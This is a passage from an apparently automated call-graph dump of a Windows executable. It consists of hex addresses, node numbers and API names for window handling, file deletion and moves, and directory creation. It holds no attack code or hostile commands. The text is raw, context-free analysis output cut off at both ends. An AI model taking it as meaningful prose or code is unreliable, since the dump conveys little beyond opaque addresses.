4240d6 52951->52915 52962 4240de SetFocus 52951->52962 52952->52927 52963 423da1 52952->52963 52955 423dfa 52953->52955 52956 423dee 52953->52956 53014 423b94 NtdllDefWindowProc_A 52955->53014 53013 423bd0 29 API calls 52956->53013 52959->52915 52960->52915 52981 423f88 IsWindowEnabled 52960->52981 52961 423e55 52969 423e93 52961->52969 52970 423e71 52961->52970 52962->52915 52963->52915 53012 422c5c ShowWindow PostMessageA PostQuitMessage 52963->53012 52964 423ec6 52971 423ed8 52964->52971 53019 41ef68 52964->53019 52965->52915 52972 423ff5 52965->52972 52968 423ef5 52973 423f0d 52968->52973 53007 41eeb4 GetCurrentThreadId EnumThreadWindows 52968->53007 52975 423a94 6 API calls 52969->52975 53017 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52970->53017 53025 423b94 NtdllDefWindowProc_A 52971->53025 52984 423ffc IsWindowVisible 52972->52984 52980 423a94 6 API calls 52973->52980 52983 423e9b PostMessageA 52975->52983 52980->52915 52981->52915 52985 423f96 52981->52985 52982 423e79 PostMessageA 52982->52915 52983->52915 52984->52915 52986 42400a GetFocus 52984->52986 53026 412320 21 API calls 52985->53026 53027 4181f0 52986->53027 52989 42401f SetFocus 53029 415250 52989->53029 52993 423b1d 52992->52993 52994 423aa4 52992->52994 52993->52887 52994->52993 52995 423aaa EnumWindows 52994->52995 52995->52993 52996 423ac6 GetWindow GetWindowLongA 52995->52996 53034 423a2c GetWindow 52995->53034 52997 423ae5 52996->52997 52997->52993 52998 423b11 SetWindowPos 52997->52998 52998->52993 52998->52997 52999->52897 53000->52897 53002 423b82 53001->53002 53003 423b8d 53001->53003 53002->53003 53004 408730 21 API calls 53002->53004 53003->52902 53003->52903 53004->53003 53005->52961 53006->52968 53008 41ef39 53007->53008 53008->52973 53009->52915 53010->52915 53011->52915 53012->52915 53013->52915 53014->52915 53015->52915 53016->52943 53017->52982 53018->52964 53020 41ef70 IsWindow 53019->53020 53021 41ef9c 53019->53021 53022 41ef7f EnableWindow 53020->53022 53024 41ef8a 53020->53024 53021->52971 53022->53024 53023 402660 4 API calls 53023->53024 53024->53020 53024->53021 53024->53023 53025->52915 53026->52915 53028 4181fa 53027->53028 53028->52989 53030 41526b SetFocus 53029->53030 53030->52915 53031->52951 53032->52943 53033->52943 53035 423a4d GetWindowLongA 53034->53035 53036 423a59 53034->53036 53035->53036 53037 40cd10 53038 40cd22 53037->53038 53039 40cd1d 53037->53039 53041 406f58 CloseHandle 53039->53041 53041->53038 53042 416b52 53043 416bfa 53042->53043 53044 416b6a 53042->53044 53061 41532c 18 API calls 53043->53061 53045 416b84 SendMessageA 53044->53045 53046 416b78 53044->53046 53057 416bd8 53045->53057 53048 416b82 CallWindowProcA 53046->53048 53049 416b9e 53046->53049 53048->53057 53058 41a068 GetSysColor 53049->53058 53052 416ba9 SetTextColor 53053 416bbe 53052->53053 53059 41a068 GetSysColor 53053->53059 53055 416bc3 SetBkColor 53060 41a6f0 GetSysColor CreateBrushIndirect 53055->53060 53058->53052 53059->53055 53060->53057 53061->53057 53062 49219c 53063 4921d6 53062->53063 53064 4921d8 53063->53064 53065 4921e2 53063->53065 53262 4090a8 MessageBeep 53064->53262 53067 49221a 53065->53067 53068 4921f1 53065->53068 53075 492229 53067->53075 53076 492252 53067->53076 53070 44706c 32 API calls 53068->53070 53069 403420 4 API calls 53071 49282e 53069->53071 53072 4921fe 53070->53072 53073 403400 4 API calls 53071->53073 53263 406bc0 53072->53263 53077 492836 53073->53077 53079 44706c 32 API calls 53075->53079 53082 49228a 53076->53082 53083 492261 53076->53083 53081 492236 53079->53081 53271 406c10 18 API calls 53081->53271 53089 492299 53082->53089 53090 4922b2 53082->53090 53086 44706c 32 API calls 53083->53086 53085 492241 53272 4473c0 19 API calls 53085->53272 53088 49226e 53086->53088 53273 406c44 18 API calls 53088->53273 53275 407290 19 API calls 53089->53275 53097 4922c1 53090->53097 53098 4922e6 53090->53098 53093 492279 53274 4473c0 19 API calls 53093->53274 53094 4922a1 53276 4473c0 19 API calls 53094->53276 53099 44706c 32 API calls 53097->53099 53101 49231e 53098->53101 53102 4922f5 53098->53102 53100 4922ce 53099->53100 53277 4072b8 53100->53277 53109 49232d 53101->53109 53110 492356 53101->53110 53104 44706c 32 API calls 53102->53104 53106 492302 53104->53106 53105 4922d6 53280 447144 19 API calls 53105->53280 53108 42c814 19 API calls 53106->53108 53111 49230d 53108->53111 53112 44706c 32 API calls 53109->53112 53115 4923a2 53110->53115 53116 492365 53110->53116 53281 4473c0 19 API calls 53111->53281 53114 49233a 53112->53114 53282 407208 22 API calls 53114->53282 53122 4923da 53115->53122 53123 4923b1 53115->53123 53119 44706c 32 API calls 53116->53119 53118 492345 53283 4473c0 19 API calls 53118->53283 53121 492374 53119->53121 53124 44706c 32 API calls 53121->53124 53130 4923e9 53122->53130 53131 492412 53122->53131 53125 44706c 32 API calls 53123->53125 53126 492385 53124->53126 53127 4923be 53125->53127 53284 491ea0 22 API calls 53126->53284 53129 42c8b4 19 API calls 53127->53129 53133 4923c9 53129->53133 53134 44706c 32 API calls 53130->53134 53138 49244a 53131->53138 53139 492421 53131->53139 53132 492391 53285 4473c0 19 API calls 53132->53285 53286 4473c0 19 API calls 53133->53286 53137 4923f6 53134->53137 53287 42c8dc 53137->53287 53145 492459 53138->53145 53146 492482 53138->53146 53142 44706c 32 API calls 53139->53142 53144 49242e 53142->53144 53296 42c90c 19 API calls 53144->53296 53148 44706c 32 API calls 53145->53148 53153 4924ba 53146->53153 53154 492491 53146->53154 53150 492466 53148->53150 53149 492439 53297 4473c0 19 API calls 53149->53297 53152 42c93c 19 API calls 53150->53152 53155 492471 53152->53155 53159 4924c9 53153->53159 53162 492506 53153->53162 53156 44706c 32 API calls 53154->53156 53298 4473c0 19 API calls 53155->53298 53158 49249e 53156->53158 53299 42c964 53158->53299 53161 44706c 32 API calls 53159->53161 53164 4924d8 53161->53164 53166 492558 53162->53166 53167 492515 53162->53167 53169 44706c 32 API calls 53164->53169 53176 4925cb 53166->53176 53177 492567 53166->53177 53170 44706c 32 API calls 53167->53170 53168 4921dd 53168->53069 53171 4924e9 53169->53171 53172 492528 53170->53172 53305 42c508 19 API calls 53171->53305 53174 44706c 32 API calls 53172->53174 53178 492539 53174->53178 53175 4924f5 53306 4473c0 19 API calls 53175->53306 53184 49260a 53176->53184 53185 4925da 53176->53185 53250 44706c 53177->53250 53307 492098 26 API calls 53178->53307 53183 492547 53308 4473c0 19 API calls 53183->53308 53195 492649 53184->53195 53196 492619 53184->53196 53189 44706c 32 API calls 53185->53189 53187 492582 53191 4925bb 53187->53191 53192 492586 53187->53192 53190 4925e7 53189->53190 53311 45297c Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 53190->53311 53310 447144 19 API calls 53191->53310 53194 44706c 32 API calls 53192->53194 53199 492595 53194->53199 53204 492688 53195->53204 53205 492658 53195->53205 53200 44706c 32 API calls 53196->53200 53198 4925f4 53312 447144 19 API calls 53198->53312 53255 452cf4 53199->53255 53203 492626 53200->53203 53313 4527e4 53203->53313 53215 4926d0 53204->53215 53216 492697 53204->53216 53209 44706c 32 API calls 53205->53209 53206 492605 53206->53168 53207 4925a5 53309 447144 19 API calls 53207->53309 53212 492665 53209->53212 53211 492633 53320 447144 19 API calls 53211->53320 53321 452e84 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53212->53321 53221 492718 53215->53221 53222 4926df 53215->53222 53218 44706c 32 API calls 53216->53218 53217 492672 53322 447144 19 API calls 53217->53322 53220 4926a6 53218->53220 53223 44706c 32 API calls 53220->53223 53227 49272b 53221->53227 53234 4927e1 53221->53234 53225 44706c 32 API calls 53222->53225 53224 4926b7 53223->53224 53323 4472ec 53224->53323 53226 4926ee 53225->53226 53228 44706c 32 API calls 53226->53228 53230 44706c 32 API calls 53227->53230 53231 4926ff 53228->53231 53232 492758 53230->53232 53237 4472ec 19 API calls 53231->53237 53233 44706c 32 API calls 53232->53233 53235 49276f 53233->53235 53234->53168 53332 447010 32 API calls 53234->53332 53329 407dec 21 API calls 53235->53329 53237->53168 53238 4927fa 53239 42e8d8 19 API calls 53238->53239 53240 492802 53239->53240 53333 4473c0 19 API calls 53240->53333 53243 492791 53244 44706c 32 API calls 53243->53244 53245 4927a5 53244->53245 53330 408518 18 API calls 53245->53330 53247 4927b0 53331 4473c0 19 API calls 53247->53331 53249 4927bc 53251 447074 53250->53251 53334 4360ec 53251->53334 53253 447093 53254 42c618 21 API calls 53253->53254 53254->53187 53256 452798 2 API calls 53255->53256 53258 452d0d 53256->53258 53257 452d11 53257->53207 53258->53257 53259 452d35 MoveFileA GetLastError 53258->53259 53260 4527d4 Wow64RevertWow64FsRedirection 53259->53260 53261 452d5b 53260->53261 53261->53207 53262->53168 53264 406bcf 53263->53264 53265 406bf1 53264->53265 53266 406be8 53264->53266 53269 403778 18 API calls 53265->53269 53267 403400 4 API calls 53266->53267 53268 406bef 53267->53268 53270 4473c0 19 API calls 53268->53270 53269->53268 53270->53168 53271->53085 53272->53168 53273->53093 53274->53168 53275->53094 53276->53168 53278 403738 53277->53278 53279 4072c2 SetCurrentDirectoryA 53278->53279 53279->53105 53280->53168 53281->53168 53282->53118 53283->53168 53284->53132 53285->53168 53286->53168 53360 42c684 53287->53360 53290 42c8f0 53292 403400 4 API calls 53290->53292 53291 42c8f9 53293 403778 18 API calls 53291->53293 53294 42c8f7 53292->53294 53293->53294 53295 4473c0 19 API calls 53294->53295 53295->53168 53296->53149 53297->53168 53298->53168 53300 42c7ac IsDBCSLeadByte 53299->53300 53301 42c974 53300->53301 53302 403778 18 API calls 53301->53302 53303 42c985 53302->53303 53304 4473c0 19 API calls 53303->53304 53304->53168 53305->53175 53306->53168 53307->53183 53308->53168 53309->53168 53310->53168 53311->53198 53312->53206 53314 452798 2 API calls 53313->53314 53316 4527fa 53314->53316 53315 4527fe 53315->53211 53316->53315 53317 45281c CreateDirectoryA GetLastError 53316->53317 53318 4527d4 Wow64RevertWow64FsRedirection 53317->53318 53319 452842 53318->53319 53319->53211 53320->53168 53321->53217 53322->53168 53324 4472f4 53323->53324 53363 436454 VariantClear 53324->53363 53326 447317 53328 44732e 53326->53328 53364 408c1c 18 API calls 53326->53364 53328->53168 53329->53243 53330->53247 53331->53249 53332->53238 53333->53168 53335 4360f8 53334->53335 53336 43611a 53334->53336 53335->53336 53354 408c1c 18 API calls 53335->53354 53337 43619d 53336->53337 53339 436161 53336->53339 53340 436191 53336->53340 53341 436185 53336->53341 53342 436179 53336->53342 53343 43616d 53336->53343 53359 408c1c 18 API calls 53337->53359 53355 403510 53339->53355 53358 4040e8 32 API calls 53340->53358 53345 403494 4 API calls 53341->53345 53342->53253 53349 403510 18 API calls 53343->53349 53350 43618e 53345->53350 53348 4361ae 53348->53253 53353 436176 53349->53353 53350->53253 53351 43619a 53351->53253 53353->53253 53354->53336 53356 4034e0 18 API calls 53355->53356 53357 40351d 53356->53357 53357->53253 53358->53351 53359->53348 53361 42c68c IsDBCSLeadByte 53360->53361 53362 42c68b 53361->53362 53362->53290 53362->53291 53363->53326 53364->53328 53365 416654 53366 416661 53365->53366 53367 4166bb 53365->53367 53372 416560 CreateWindowExA 53366->53372 53368 416668 SetPropA SetPropA 53368->53367 53369 41669b 53368->53369 53370 4166ae SetWindowPos 53369->53370 53370->53367 53372->53368 53373 46bc10 53374 46bc44 53373->53374 53406 46c0ad 53373->53406 53376 46bcdc 53374->53376 53377 46bcba 53374->53377 53378 46bccb 53374->53378 53379 46bc98 53374->53379 53380 46bca9 53374->53380 53391 46bc80 53374->53391 53375 403400 4 API calls 53382 46c0ec 53375->53382 53650 46bba0 60 API calls 53376->53650 53429 46b7d0 53377->53429 53649 46b990 82 API calls 53378->53649 53647 46b520 62 API calls 53379->53647 53648 46b688 57 API calls 53380->53648 53381 468d38 33 API calls 53392 46bd18 53381->53392 53388 403400 4 API calls 53382->53388 53390 46c0f4 53388->53390 53389 46bc9e 53389->53391 53389->53406 53391->53381 53391->53406 53405 46bd5b 53392->53405 53392->53406 53651 495478 53392->53651 53394 468c74 33 API calls 53394->53405 53395 46be7e 53670 483a70 138 API calls 53395->53670 53396 414af8 18 API calls 53396->53405 53399 46be99 53399->53406 53400 42cbd0 20 API calls 53400->53405 53401 46b02c 37 API calls 53401->53405 53403 403450 18 API calls 53403->53405 53405->53394 53405->53395 53405->53396 53405->53400 53405->53401 53405->53403 53405->53406 53407 46bed7 53405->53407 53425 46bf9f 53405->53425 53464 46ad98 53405->53464 53574 483568 53405->53574 53671 46b2dc 33 API calls 53405->53671 53406->53375 53471 469fe0 53407->53471 53408 46b02c 37 API calls 53408->53406 53410 46bf3d 53411 403450 18 API calls 53410->53411 53412 46bf4d 53411->53412 53413 46bfa9 53412->53413 53414 46bf59 53412->53414 53416 46b02c 37 API calls 53413->53416 53419 46c06b 53413->53419 53415 457fc4 38 API calls 53414->53415 53417 46bf78 53415->53417 53420 46bfc3 53416->53420 53418 457fc4 38 API calls 53417->53418 53418->53425 53421 46c004 53420->53421 53422 46bfec SetActiveWindow 53420->53422 53532 46a388 53421->53532 53422->53421 53424 46c02e 53424->53425 53426 46c04e 53424->53426 53425->53408 53427 46aea8 35 API calls 53426->53427 53428 46c063 53427->53428 53672 46c524 53429->53672 53432 46b952 53433 403420 4 API calls 53432->53433 53435 46b96c 53433->53435 53434 414af8 18 API calls 53436 46b81e 53434->53436 53437 403400 4 API calls 53435->53437 53463 46b93e 53436->53463 53675 45602c 27 API calls 53436->53675 53438 46b974 53437->53438 53441 403400 4 API calls 53438->53441 53440 403450 18 API calls 53440->53432 53442 46b97c 53441->53442 53442->53391 53443 46b901 53443->53432 53449 42cd58 21 API calls 53443->53449 53443->53463 53444 46b8a1 53444->53432 53444->53443 53677 42cd58 53444->53677 53447 46b83c 53447->53444 53448 4666a8 33 API calls 53447->53448 53451 46b86b 53448->53451 53452 46b917 53449->53452 53450 4514cc 18 API calls 53453 46b8f1 53450->53453 53454 4666a8 33 API calls 53451->53454 53457 4514cc 18 API calls 53452->53457 53452->53463 53680 47f454 57 API calls 53453->53680 53456 46b87c 53454->53456 53458 45149c 18 API calls 53456->53458 53459 46b92e 53457->53459 53460 46b891 53458->53460 53681 47f454 57 API calls 53459->53681 53676 47f454 57 API calls 53460->53676 53463->53432 53463->53440 53465 46ada4 53464->53465 53466 46ada9 53464->53466 53467 46ada7 53465->53467 53802 46a804 53465->53802 53887 469b44 60 API calls 53466->53887 53467->53405 53469 46adb1 53469->53405 53472 403400 4 API calls 53471->53472 53473 46a00e 53472->53473 53903 47e184 53473->53903 53475 46a071 53476 46a075 53475->53476 53477 46a08e 53475->53477 53478 4668a8 34 API calls 53476->53478 53479 46a07f 53477->53479 53910 495368 18 API calls 53477->53910 53478->53479 53483 46a1ad 53479->53483 53484 46a218 53479->53484 53531 46a322 53479->53531 53481 403420 4 API calls 53485 46a34c 53481->53485 53482 46a0aa 53482->53479 53486 46a0b2 53482->53486 53487 403494 4 API calls 53483->53487 53488 403494 4 API calls 53484->53488 53485->53410 53490 46b02c 37 API calls 53486->53490 53491 46a1ba 53487->53491 53489 46a225 53488->53489 53493 40357c 18 API calls 53489->53493 53500 46a0bf 53490->53500 53492 40357c 18 API calls 53491->53492 53494 46a1c7 53492->53494 53495 46a232 53493->53495 53496 40357c 18 API calls 53494->53496 53497 40357c 18 API calls 53495->53497 53498 46a1d4 53496->53498 53499 46a23f 53497->53499 53501 40357c 18 API calls 53498->53501 53502 40357c 18 API calls 53499->53502 53505 46a100 53500->53505 53506 46a0e8 SetActiveWindow 53500->53506 53503 46a1e1 53501->53503 53504 46a24c 53502->53504 53507 4668a8 34 API calls 53503->53507 53508 40357c 18 API calls 53504->53508 53911 42f5d4 53505->53911 53506->53505 53509 46a1ef 53507->53509 53510 46a25a 53508->53510 53512 40357c 18 API calls 53509->53512 53513 414b28 18 API calls 53510->53513 53515 46a1f8 53512->53515 53516 46a216 53513->53516 53518 40357c 18 API calls 53515->53518 53519 466be0 25 API calls 53516->53519 53521 46a205 53518->53521 53525 46a27c 53519->53525 53520 46a151 53523 46aea8 35 API calls 53520->53523 53522 414b28 18 API calls 53521->53522 53522->53516 53524 46a183 53523->53524 53524->53410 53526 414b28 18 API calls 53525->53526 53525->53531 53527 46a2df 53526->53527 53928 496228 MulDiv 53527->53928 53529 46a2fc 53530 414b28 18 API calls 53529->53530 53530->53531 53531->53481 53537 46a3b4 53532->53537 53534 46a3ef 53541 46a564 53534->53541 53547 46a403 53534->53547 53535 46a6e4 53539 403400 4 API calls 53535->53539 53536 46a58b 53543 414b28 18 API calls 53536->53543 53537->53534 53984 47e48c 53537->53984 53538 46a541 53544 46a55c 53538->53544 53551 402660 4 API calls 53538->53551 53545 46a709 53539->53545 53540 402648 18 API calls 53540->53547 53541->53535 53541->53536 53542 46a5a1 53541->53542 53549 414b28 18 API calls 53542->53549 53548 46a59f 53543->53548 53544->53424 53545->53424 53546 402660 4 API calls 53546->53547 53547->53540 53547->53546 53557 46a476 53547->53557 54000 496228 MulDiv 53548->54000 53549->53548 53550 46a50d 53552 457fc4 38 API calls 53550->53552 53551->53544 53552->53538 53555 46a5c2 53558 466be0 25 API calls 53555->53558 53556 457fc4 38 API calls 53556->53557 53557->53538 53557->53550 53557->53556 53560 40357c 18 API calls 53557->53560 53999 403ba4 21 API calls 53557->53999 53559 46a5f6 53558->53559 54001 466be8 KiUserCallbackDispatcher 53559->54001 53560->53557 53562 46a609 53563 466be0 25 API calls 53562->53563 53564 46a61a 53563->53564 53565 414b28 18 API calls 53564->53565 53566 46a64d 53565->53566 54002 496228 MulDiv 53566->54002 53568 46a66a 53569 414b28 18 API calls 53568->53569 53570 46a6a1 53569->53570 54003 496228 MulDiv 53570->54003 53572 46a6be 53573 414b28 18 API calls 53572->53573 53573->53535 53575 46c524 63 API calls 53574->53575 53576 4835ab 53575->53576 53577 4835b4 53576->53577 54221 408bf0 19 API calls 53576->54221 53579 414af8 18 API calls 53577->53579 53580 4835c4 53579->53580 53581 403450 18 API calls 53580->53581 53582 4835d1 53581->53582 54031 46c87c 53582->54031 53585 4835e1 53587 414af8 18 API calls 53585->53587 53588 4835f1 53587->53588 53589 403450 18 API calls 53588->53589 53590 4835fe 53589->53590 53591 46992c SendMessageA 53590->53591 53592 483617 53591->53592 53593 483668 53592->53593 54223 47a29c 37 API calls 53592->54223 53595 4241ec 11 API calls 53593->53595 53596 483672 53595->53596 53597 483698 53596->53597 53598 483683 SetActiveWindow 53596->53598 54060 482998 53597->54060 53598->53597 53647->53389 53648->53391 53649->53391 53650->53391 55761 43da3c 53651->55761 53654 49552a 53656 495539 53654->53656 55799 494ca0 18 API calls 53654->55799 53655 4954a4 55766 431c44 53655->55766 53656->53405 53665 4954ee 55797 494d34 18 API calls 53665->55797 53667 495502 55798 433e44 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53667->55798 53669 495522 53669->53405 53670->53399 53671->53405 53682 46c5bc 53672->53682 53675->53447 53676->53444 53796 42ccdc 53677->53796 53680->53443 53681->53463 53683 414af8 18 API calls 53682->53683 53684 46c5f0 53683->53684 53743 466940 53684->53743 53687 414b28 18 API calls 53688 46c602 53687->53688 53689 46c611 53688->53689 53694 46c62a 53688->53694 53772 47f454 57 API calls 53689->53772 53691 46c625 53692 403420 4 API calls 53691->53692 53693 46b802 53692->53693 53693->53432 53693->53434 53695 46c671 53694->53695 53697 46c658 53694->53697 53696 46c6d6 53695->53696 53710 46c675 53695->53710 53775 42cb5c CharNextA 53696->53775 53773 47f454 57 API calls 53697->53773 53700 46c6e5 53701 46c6e9 53700->53701 53706 46c702 53700->53706 53776 47f454 57 API calls 53701->53776 53703 46c6bd 53774 47f454 57 API calls 53703->53774 53705 46c726 53777 47f454 57 API calls 53705->53777 53706->53705 53752 466ab0 53706->53752 53710->53703 53710->53706 53713 46c73f 53714 403778 18 API calls 53713->53714 53715 46c755 53714->53715 53760 42c9ac 53715->53760 53718 46c766 53778 466b3c 18 API calls 53718->53778 53719 46c797 53720 42c8dc 19 API calls 53719->53720 53722 46c7a2 53720->53722 53724 42c40c 19 API calls 53722->53724 53723 46c779 53725 4514cc 18 API calls 53723->53725 53726 46c7ad 53724->53726 53727 46c786 53725->53727 53728 42cbd0 20 API calls 53726->53728 53779 47f454 57 API calls 53727->53779 53730 46c7b8 53728->53730 53764 46c550 53730->53764 53732 46c7c0 53733 42cd58 21 API calls 53732->53733 53734 46c7c8 53733->53734 53735 46c7e2 53734->53735 53736 46c7cc 53734->53736 53735->53691 53738 46c7ec 53735->53738 53780 47f454 57 API calls 53736->53780 53739 46c7f4 GetDriveTypeA 53738->53739 53739->53691 53740 46c7ff 53739->53740 53781 47f454 57 API calls 53740->53781 53742 46c813 53742->53691 53748 46695a 53743->53748 53744 406bc0 18 API calls 53744->53748 53746 42cbd0 20 API calls 53746->53748 53747 403450 18 API calls 53747->53748 53748->53744 53748->53746 53748->53747 53749 4669a3 53748->53749 53782 42cabc 53748->53782 53750 403420 4 API calls 53749->53750 53751 4669bd 53750->53751 53751->53687 53753 466aba 53752->53753 53754 466acd 53753->53754 53793 42cb4c CharNextA 53753->53793 53754->53705 53756 466ae0 53754->53756 53757 466aea 53756->53757 53758 466b17 53757->53758 53794 42cb4c CharNextA 53757->53794 53758->53705 53758->53713 53761 42ca05 53760->53761 53762 42c9c2 53760->53762 53761->53718 53761->53719 53762->53761 53795 42cb4c CharNextA 53762->53795 53765 46c5b5 53764->53765 53766 46c563 53764->53766 53765->53732 53766->53765 53767 41eeb4 2 API calls 53766->53767 53768 46c573 53767->53768 53769 46c58d SHPathPrepareForWriteA 53768->53769 53770 41ef68 6 API calls 53769->53770 53771 46c5ad 53770->53771 53771->53732 53772->53691 53773->53691 53774->53691 53775->53700 53776->53691 53777->53691 53778->53723 53779->53691 53780->53691 53781->53742 53783 403494 4 API calls 53782->53783 53784 42cacc 53783->53784 53785 403744 18 API calls 53784->53785 53787 42cb02 53784->53787 53791 42c454 IsDBCSLeadByte 53784->53791 53785->53784 53788 42cb46 53787->53788 53790 4037b8 18 API calls 53787->53790 53792 42c454 IsDBCSLeadByte 53787->53792 53788->53748 53790->53787 53791->53784 53792->53787 53793->53753 53794->53757 53795->53762 53797 42cbd0 20 API calls 53796->53797 53798 42ccfe 53797->53798 53799 42cd06 GetFileAttributesA 53798->53799 53800 403400 4 API calls 53799->53800 53801 42cd23 53800->53801 53801->53443 53801->53450 53804 46a84b 53802->53804 53803 46acc3 53805 46acde 53803->53805 53806 46ad0f 53803->53806 53804->53803 53807 46a906 53804->53807 53809 403494 4 API calls 53804->53809 53808 403494 4 API calls 53805->53808 53810 403494 4 API calls 53806->53810 53811 46a927 53807->53811 53812 46a968 53807->53812 53814 46acec 53808->53814 53815 46a88a 53809->53815 53816 46ad1d 53810->53816 53813 403494 4 API calls 53811->53813 53820 403400 4 API calls 53812->53820 53817 46a935 53813->53817 53899 469220 26 API calls 53814->53899 53819 414af8 18 API calls 53815->53819 53900 469220 26 API calls 53816->53900 53822 414af8 18 API calls 53817->53822 53823 46a8ab 53819->53823 53824 46a966 53820->53824 53826 46a956 53822->53826 53827 403634 18 API calls 53823->53827 53844 46aa4c 53824->53844 53888 46992c 53824->53888 53825 46acfa 53828 403400 4 API calls 53825->53828 53829 403634 18 API calls 53826->53829 53830 46a8bb 53827->53830 53832 46ad40 53828->53832 53829->53824 53834 414af8 18 API calls 53830->53834 53837 403400 4 API calls 53832->53837 53833 46aad4 53835 403400 4 API calls 53833->53835 53839 46a8cf 53834->53839 53840 46aad2 53835->53840 53836 46a988 53841 46a9c6 53836->53841 53842 46a98e 53836->53842 53838 46ad48 53837->53838 53843 403420 4 API calls 53838->53843 53839->53807 53851 414af8 18 API calls 53839->53851 53894 469d68 57 API calls 53840->53894 53845 403400 4 API calls 53841->53845 53846 403494 4 API calls 53842->53846 53848 46ad55 53843->53848 53844->53833 53849 46aa93 53844->53849 53850 46a9c4 53845->53850 53847 46a99c 53846->53847 53853 47c6f0 57 API calls 53847->53853 53848->53467 53854 403494 4 API calls 53849->53854 53862 469c20 57 API calls 53850->53862 53855 46a8f6 53851->53855 53857 46a9b4 53853->53857 53858 46aaa1 53854->53858 53859 403634 18 API calls 53855->53859 53856 46aafd 53865 46ab5e 53856->53865 53866 46ab08 53856->53866 53860 403634 18 API calls 53857->53860 53861 414af8 18 API calls 53858->53861 53859->53807 53860->53850 53863 46aac2 53861->53863 53864 46a9ed 53862->53864 53867 403634 18 API calls 53863->53867 53871 46aa4e 53864->53871 53872 46a9f8 53864->53872 53868 403400 4 API calls 53865->53868 53869 403494 4 API calls 53866->53869 53867->53840 53870 46ab66 53868->53870 53877 46ab16 53869->53877 53875 46ab5c 53870->53875 53886 46ac0f 53870->53886 53873 403400 4 API calls 53871->53873 53874 403494 4 API calls 53872->53874 53873->53844 53879 46aa06 53874->53879 53875->53870 53895 495368 18 API calls 53875->53895 53877->53870 53877->53875 53881 403634 18 API calls 53877->53881 53878 46ab89 53878->53886 53896 495614 32 API calls 53878->53896 53879->53844 53882 403634 18 API calls 53879->53882 53881->53877 53882->53879 53884 46acb0 53898 429154 SendMessageA SendMessageA 53884->53898 53897 429104 SendMessageA 53886->53897 53887->53469 53901 42a050 SendMessageA 53888->53901 53890 46993b 53891 46995b 53890->53891 53902 42a050 SendMessageA 53890->53902 53891->53836 53893 46994b 53893->53836 53894->53856 53895->53878 53896->53886 53897->53884 53898->53803 53899->53825 53900->53825 53901->53890 53902->53893 53904 47e19d 53903->53904 53907 47e1da 53903->53907 53929 455db4 53904->53929 53907->53475 53909 47e1f1 53909->53475 53910->53482 53912 42f5e0 53911->53912 53913 42f603 GetActiveWindow GetFocus 53912->53913 53914 41eeb4 2 API calls 53913->53914 53915 42f61a 53914->53915 53916 42f637 53915->53916 53917 42f627 RegisterClassA 53915->53917 53918 42f6c6 SetFocus 53916->53918 53919 42f645 CreateWindowExA 53916->53919 53917->53916 53920 403400 4 API calls 53918->53920 53919->53918 53921 42f678 53919->53921 53922 42f6e2 53920->53922 53978 42428c 53921->53978 53927 495614 32 API calls 53922->53927 53924 42f6a0 53925 42f6a8 CreateWindowExA 53924->53925 53925->53918 53926 42f6be ShowWindow 53925->53926 53926->53918 53927->53520 53928->53529 53930 455dc5 53929->53930 53931 455dd2 53930->53931 53932 455dc9 53930->53932 53963 455b98 43 API calls 53931->53963 53955 455ab8 53932->53955 53935 455dcf 53935->53907 53936 47ddf4 53935->53936 53941 47def0 53936->53941 53944 47de34 53936->53944 53937 403420 4 API calls 53938 47dfd3 53937->53938 53938->53909 53939 479bdc 33 API calls 53939->53944 53940 479a9c 33 API calls 53940->53941 53941->53940 53948 47df41 53941->53948 53951 47de93 53941->53951 53943 47de9c 53943->53944 53949 47c6f0 57 API calls 53943->53949 53950 42c93c 19 API calls 53943->53950 53952 42c964 19 API calls 53943->53952 53954 47dedd 53943->53954 53976 47db00 66 API calls 53943->53976 53944->53939 53944->53941 53944->53943 53947 47c6f0 57 API calls 53944->53947 53944->53951 53972 479d58 53944->53972 53945 47c6f0 57 API calls 53945->53948 53946 454174 34 API calls 53946->53948 53947->53944 53948->53941 53948->53945 53948->53946 53948->53954 53949->53943 53950->53943 53951->53937 53952->53943 53954->53951 53956 42de2c RegOpenKeyExA 53955->53956 53957 455ad5 53956->53957 53958 455b23 53957->53958 53964 4559ec 53957->53964 53958->53935 53961 4559ec 20 API calls 53962 455b04 RegCloseKey 53961->53962 53962->53935 53963->53935 53969 42dd68 53964->53969 53966 455a14 53967 403420 4 API calls 53966->53967 53968 455a9e 53967->53968 53968->53961 53970 42dc10 20 API calls 53969->53970 53971 42dd71 53970->53971 53971->53966 53973 479d64 53972->53973 53974 479d7f 53973->53974 53977 4533b8 18 API calls 53973->53977 53974->53944 53976->53943 53977->53974 53979 4242be 53978->53979 53980 42429e GetWindowTextA 53978->53980 53982 403494 4 API calls 53979->53982 53981 4034e0 18 API calls 53980->53981 53983 4242bc 53981->53983 53982->53983 53983->53924 53985 402648 18 API calls 53984->53985 53986 47e4b0 53985->53986 53987 47ddf4 75 API calls 53986->53987 53988 47e4d3 53987->53988 53989 47e4e0 53988->53989 53991 47e568 53988->53991 54027 4953c4 32 API calls 53989->54027 53992 47e57c 53991->53992 54004 47e21c 53991->54004 53995 47e5a8 53992->53995 53997 402660 4 API calls 53992->53997 53993 47e522 53993->53534 53996 402660 4 API calls 53995->53996 53998 47e5b2 53996->53998 53997->53992 53998->53534 53999->53557 54000->53555 54001->53562 54002->53568 54003->53572 54005 403494 4 API calls 54004->54005 54006 47e24b 54005->54006 54007 42c93c 19 API calls 54006->54007 54018 47e2af 54006->54018 54008 47e266 54007->54008 54028 42ca10 21 API calls 54008->54028 54009 47e2bf 54011 403400 4 API calls 54009->54011 54014 47e3f9 54011->54014 54012 47e32b 54012->54009 54013 47e380 54012->54013 54030 453c80 25 API calls 54012->54030 54021 402648 18 API calls 54013->54021 54016 403420 4 API calls 54014->54016 54019 47e406 54016->54019 54017 47e375 54020 403494 4 API calls 54017->54020 54018->54009 54018->54012 54022 402660 4 API calls 54018->54022 54019->53992 54020->54013 54023 47e394 54021->54023 54022->54018 54024 47e3bc MultiByteToWideChar 54023->54024 54024->54009 54025 47e271 54025->54018 54029 42e8b0 CharNextA 54025->54029 54027->53993 54028->54025 54029->54025 54030->54017 54032 46c8a5 54031->54032 54033 46c8f2 54032->54033 54034 414af8 18 API calls 54032->54034 54036 403420 4 API calls 54033->54036 54035 46c8bb 54034->54035 54230 4669cc 20 API calls 54035->54230 54038 46c99c 54036->54038 54038->53585 54222 